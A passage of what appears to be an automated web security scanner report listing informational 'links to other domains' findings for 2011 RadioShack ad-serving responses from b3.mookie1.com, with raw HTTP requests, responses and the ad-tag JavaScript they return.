document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

17.95. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?
http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

17.96. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.97. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1419206302?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.98. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?
http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=835359449?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/835359449/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=835359449?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.99. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90?http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541^950190^81^0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?
http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1687741401?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.100. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The page was loaded from a URL containing a query string:

